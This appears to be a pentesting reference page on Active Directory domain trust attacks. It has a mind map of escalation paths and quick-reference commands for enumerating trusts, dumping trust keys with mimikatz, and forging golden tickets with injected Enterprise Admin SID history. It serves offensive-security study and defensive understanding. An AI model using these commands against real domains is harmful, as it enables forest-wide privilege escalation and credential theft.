Domain Trust Attacks
Attacking trust relationships
Domain Trust AttacksTip: Click on any node to see related information!
Interactive Mind Map
graph TD
A[Enumerate Trusts] --> B[Get-DomainTrust]
B --> C{Trust Type}
C --> D[Parent-Child]
C --> E[Forest Trust]
C --> F[External Trust]
D --> G[Compromise Child Domain]
G --> H[Get krbtgt Hash]
H --> I[Golden Ticket + SID History]
I --> J[Enterprise Admin Access]
E --> K[Check SID Filtering]
K -->|Disabled| I
K -->|Enabled| L[Limited Access]
F --> M[Credential Reuse Attack]
Related Modules
Quick Reference
Enumerate Trusts
# PowerView Get-DomainTrust # Enumerate trusts Get-DomainTrustMapping # Map trust relationships # Netdom netdom trust /domain:target.local # Enumerate trusts via native tool
Trust Types
- Parent-Child: Automatic, transitive
- Forest: Between forests
- External: Non-transitive
SID History Injection
# Get trust key mimikatz: lsadump::trust /patch # Dump trust keys # Create Golden Ticket with SID History mimikatz: kerberos::golden /user:admin /domain:child.local /sid:S-1-5-21-... /sids:S-1-5-21-...-519 /krbtgt:HASH /ptt # Forge inter-realm ticket with Enterprise Admin SID
ExtraSids Attack
# Add Enterprise Admins SID ticket with /sids:S-1-5-21-parent-519 # SID History injection payload